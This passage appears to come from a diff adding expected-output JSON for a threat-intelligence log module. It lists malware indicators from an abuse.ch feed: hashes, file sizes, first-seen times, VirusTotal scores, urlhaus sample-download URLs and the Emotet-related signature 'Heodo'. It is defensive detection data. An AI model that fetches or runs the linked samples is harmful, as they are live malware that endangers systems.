"1344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:14:05.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 580, + "related.hash": [ + "ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr", + "threatintel.indicator.file.hash.tlsh": "4E44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:11:41.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 1160, + "related.hash": [ + "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.virustotal.link": "https://www.virustotal.com/gui/file/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/detection/f-b0e914d", + "threatintel.abusemalware.virustotal.percent": "37.88", + "threatintel.abusemalware.virustotal.result": "25 / 66", + "threatintel.indicator.file.hash.sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd", + "threatintel.indicator.file.hash.tlsh": "7544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:11:22.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 1904, + "related.hash": [ + "7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH", + "threatintel.indicator.file.hash.tlsh": "5554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:11:21.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 2493, + "related.hash": [ + "760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b", + "6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b", + "threatintel.indicator.file.hash.ssdeep": "6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR", + "threatintel.indicator.file.hash.tlsh": "3CE0C002AB26C036500D154C221655B3B871911503CA14E6A6824BEA765D4A3290D190", + "threatintel.indicator.file.size": 352, + "threatintel.indicator.file.type": "unknown", + "threatintel.indicator.first_seen": "2021-01-14T06:08:02.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 3054, + "related.hash": [ + "86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.virustotal.link": "https://www.virustotal.com/gui/file/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/detection/f-86655c0", + "threatintel.abusemalware.virustotal.percent": "39.13", + "threatintel.abusemalware.virustotal.result": "27 / 69", + "threatintel.indicator.file.hash.sha256": "86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH", + "threatintel.indicator.file.hash.tlsh": "0D44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:08:02.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 3798, + "related.hash": [ + "e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL", + "threatintel.indicator.file.hash.tlsh": "2554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:53.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 4387, + "related.hash": [ + "beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg", + "threatintel.indicator.file.hash.tlsh": "A044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:41.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 4967, + "related.hash": [ + "7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.signature": "Heodo", + "threatintel.indicator.file.hash.sha256": "7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv", + "threatintel.indicator.file.hash.tlsh": "4544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:31.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 5550, + "related.hash": [ + "426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW", + "threatintel.indicator.file.hash.tlsh": "9454CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:07.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 6139, + "related.hash": [ + "25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR", + "threatintel.indicator.file.hash.tlsh": "F344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:07.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 6719, + "related.hash": [ + "b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7", + "threatintel.indicator.file.hash.tlsh": "F644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:06.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 7299, + "related.hash": [ + "e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP", + "threatintel.indicator.file.hash.tlsh": "BE44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:00.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 7879, + "related.hash": [ + "dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo", + "threatintel.indicator.file.hash.tlsh": "CC44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:06:36.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 8459, + "related.hash": [ + "0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.signature": "Heodo", + "threatintel.indicator.file.hash.sha256": "0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY", + "threatintel.indicator.file.hash.tlsh": "8C44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:06:13.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 9042, + "related.hash": [ + "07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e", + "6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e", + "threatintel.indicator.file.hash.ssdeep": "6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk", + "threatintel.indicator.file.hash.tlsh": "6B54CF217A53C826F5E800FCA6E9878914167F346F44A4C773D40F6AA8759E2EF2B317", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 280064, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:52.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 9611, + "related.hash": [ + "708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj", + "threatintel.indicator.file.hash.tlsh": "6644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:51.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 10191, + "related.hash": [ + "f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.signature": "Heodo", + "threatintel.indicator.file.hash.sha256": "f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM", + "threatintel.indicator.file.hash.tlsh": "0754CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:50.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 10783, + "related.hash": [ + "94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js", + "threatintel.indicator.file.hash.tlsh": "BB44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:36.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 11363, + "related.hash": [ + "909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+", + "threatintel.indicator.file.hash.tlsh": "C554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:16.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 11952, + "related.hash": [ + "d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.signature": "Heodo", + "threatintel.indicator.file.hash.sha256": "d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa", + "threatintel.indicator.file.hash.ssdeep": 